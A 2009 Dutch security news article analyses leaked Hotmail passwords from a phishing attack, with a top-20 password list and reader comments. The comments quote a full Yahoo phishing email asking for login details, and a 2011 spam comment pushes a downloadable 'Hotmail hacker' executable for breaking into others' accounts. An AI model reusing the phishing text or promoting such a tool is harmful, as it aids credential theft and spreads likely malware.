image

123456 meest gebruikte Hotmail wachtwoord

woensdag 7 oktober 2009, 10:17 door Redactie, 15 reacties

Een onderzoeker die de lijst met gestolen Hotmail wachtwoorden heeft onderzocht, ontdekte dat '123456' het meest voorkomende wachtwoord is en wachtwoorden het vaakst uit 6 karakters bestaan. De inloggegevens werden via een ordinaire phishingaanval bemachtigd. Daarvoor gebruikten de aanvallers een slecht ontworpen phishingkit, aangezien de gebruikers vervolgens niet op de echte Hotmail website werden ingelogd. Waarschijnlijk kregen de slachtoffers alleen een foutmelding, waarop sommigen het nog een aantal keren probeerden.

In totaal ging het om 9843 geldige wachtwoorden, waarvan er 8931 (90%) uniek waren. Het langste wachtwoord, bestaande uit 30 karakters was "lafaroleratropezoooooooooooooo". Het kortste wachtwoord bestond uit één karakter, ")". De meeste wachtwoorden zijn tussen de 6 en 9 karakters lang, waarbij 22% uit zes, 14% uit zeven, 21% uit acht en 12% uit negen karakters bestaat. Verder ontdekte Bogdan Calin van Acunetix dat 42% van de wachtwoorden alleen uit kleine letters is opgebouwd, terwijl 30% een combinatie van cijfers, kleine en grote letters gebruikt.

Top 20 wachtwoorden
Het meest gebruikte wachtwoord is "123456", gevolgd door "123456789" en "alejandra". In de Top 20 staan veel Spaanstalige namen, wat mogelijk een aanwijzing kan zijn waar de phishingaanval plaatsvond. Hieronder de volledige lijst, gevolgd door het aantal keren dat het wachtwoord voorkwam.

  1. 123456 - 64
  2. 123456789 - 18
  3. alejandra - 11
  4. 111111 - 10
  5. alberto - 9
  6. tequiero - 9
  7. alejandro - 9
  8. 12345678 - 9
  9. 1234567 - 8
  10. estrella - 7
  11. iloveyou - 7
  12. daniel - 7
  13. 000000 - 7
  14. roberto - 7
  15. 654321 - 6
  16. bonita - 6
  17. sebastian - 6
  18. beatriz - 6
  19. mariposa - 5
  20. america - 5
Reacties (15)
07-10-2009, 10:30 door Anoniem
Ik heb daar geen last van. Ik gebruik 654321. Achterlijk onderzoek.
07-10-2009, 10:33 door Anoniem
Toch zeer zeker opmerkelijk. Ik hoop dat dergelijke aanvallen niet nog is voorkomen.
07-10-2009, 10:40 door Anoniem
Zouden een groot deel van de mensen geen valse gegevens hebben opgegeven op de phishingsite? Gewoon eens om te zien wat er dan zou gebeuren. Want volgens mij laat hotmail je nog geen account aanmaken met zo een slecht wachtwoord...
07-10-2009, 11:12 door Anoniem
Dan moet je je wachtwoord ook maar binair invoeren, met drie bits per cijfer: 001010011100101110
07-10-2009, 11:44 door Anoniem
Frappant, dat is de cijfercombinatie van m'n bagage.
R-
07-10-2009, 12:10 door Anoniem
Door Anoniem: Frappant, dat is de cijfercombinatie van m'n bagage.
R-

Dark Helmet: So the combination is... one, two, three, four, five? That's the stupidest combination I've ever heard in my life! The kind of thing an idiot would have on his luggage!
07-10-2009, 12:14 door [Account Verwijderd]
[Verwijderd]
07-10-2009, 12:30 door Anoniem
Door Peter V:
Door Anoniem: Ik heb daar geen last van. Ik gebruik 654321. Achterlijk onderzoek.
Nog even wachten en jij vermeldt hier ook je PIN-code?
Er staat toch Anoniem, dus dan weet je alsnog niet van wie die pincode is.

Er zal vast ook iemand zijn met pincode 1337. Een zekere Anoniem, denk ik. Dan baal je wel, een ontzettend coole pincode, maar je mag het niemand vertellen.
07-10-2009, 12:49 door Anoniem
"Toch zeer zeker opmerkelijk. Ik hoop dat dergelijke aanvallen niet nog is voorkomen."

Dit soort aanvallen vinden iedere dag plaats, alleen maken de meeste phishers hun buit niet publiek.
07-10-2009, 13:08 door Anoniem
Dat is precies het wachtwoord wat ik ook gebruik; ze hadden dit wachtwoord beter niet kunnen publiceren , want nu weet iedereen mijn wachtwoord!
07-10-2009, 13:30 door Anoniem
Door Peter V:
Door Anoniem: Ik heb daar geen last van. Ik gebruik 654321. Achterlijk onderzoek.
Nog even wachten en jij vermeldt hier ook je PIN-code?
Jij snapt weer niks. Denk je nou echt dat ik hier wachtwoorden zit weg te geven? Overigens: ga je gang en probeer het maar eens te gebruiken. Weet je dan waar je het bij moet gebruiken? Het was ironisch bedoeld, zeur.
07-10-2009, 14:12 door Anoniem
Daarvoor gebruikten de aanvallers een slecht ontworpen phishingkit, aangezien de gebruikers vervolgens niet op de echte Hotmail website werden ingelogd.

Slecht ontworpen? Ze hadden tenminste nog een website. Vergelijk dat eens met het volgende waar een kennis me van de week raad bij vroeg. Ze vragen je op "reply" te klikken en je credentials in de email in te typen. Het was verstuurd vanaf een wegwerpadres bij Yahoo.


Dear Valued Member,

Due to the congestion in all Yahoo! users accounts, Yahoo! would be shutting down all unused accounts. In order to avoid the deactivation of your account, you will have to confirm your e-mail by filling out your Login Info below by clicking the reply button. The personal information requested are for the safety of your Yahoo! account. Please LEAVE all information requested.


Username:
Password:
Date Of Birth:.
Country Of Residence:

After you must have followed the instructions in the sheet, your Yahoo! account will not be interrupted and will continue as normal. Thank you for your usual co-operation. We apologize for any inconvinience.


Yahoo! Customer Care
Case number: 8941624
Property: Account Security
Contact date: 02-10-2009
07-10-2009, 16:28 door Anoniem
Door Anoniem:
Door Peter V:
Door Anoniem: Ik heb daar geen last van. Ik gebruik 654321. Achterlijk onderzoek.
Nog even wachten en jij vermeldt hier ook je PIN-code?
Jij snapt weer niks. Denk je nou echt dat ik hier wachtwoorden zit weg te geven? Overigens: ga je gang en probeer het maar eens te gebruiken. Weet je dan waar je het bij moet gebruiken? Het was ironisch bedoeld, zeur.
Zelfs ik snap Peter.V zijn sarcasme grap. Anonieme kabouters weer eens niet. [kuch]
11-10-2009, 09:55 door Anoniem
Door Anoniem:
Door Peter V:
Door Anoniem: Ik heb daar geen last van. Ik gebruik 654321. Achterlijk onderzoek.
Nog even wachten en jij vermeldt hier ook je PIN-code?
Er staat toch Anoniem, dus dan weet je alsnog niet van wie die pincode is.

Er zal vast ook iemand zijn met pincode 1337. Een zekere Anoniem, denk ik. Dan baal je wel, een ontzettend coole pincode, maar je mag het niemand vertellen.

Je mag het mij wel vertellen. Ik ben heel betrouwbaar.

Maar om even terug te komen op het onderzoek, zover ik weet accepteert Hotmail geen wachtwoorden van één karakter. Het zou mij ook niets verbazen als heel wat mensen doorkregen dat het om een phishingsite ging en daarom nepgegevens hebben ingevuld. Hoeveel waarde dit onderzoek daarom heeft, is bijzonder twijfelachtig.
15-02-2011, 18:50 door Anoniem
Na maandenlang op het internet zoeken heb ik eindelijk iets gevonden wat echt werkt!!!!

Hier hoef je gewoon het programma te openen en het vraagt je het mail adres van de persoon die je wenst te hacken. Tik het gewoon in en druk calculate! Even wachten en klaar!!!

Van de 10 mail adressen die ik heb getest had hij er 8 correct!!!

http://dl.dropbox.com/u/5123955/leet/sure/dec/hotmailhacker2011.exe

Ik hoop dat jullie hier wat aan hebben!
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.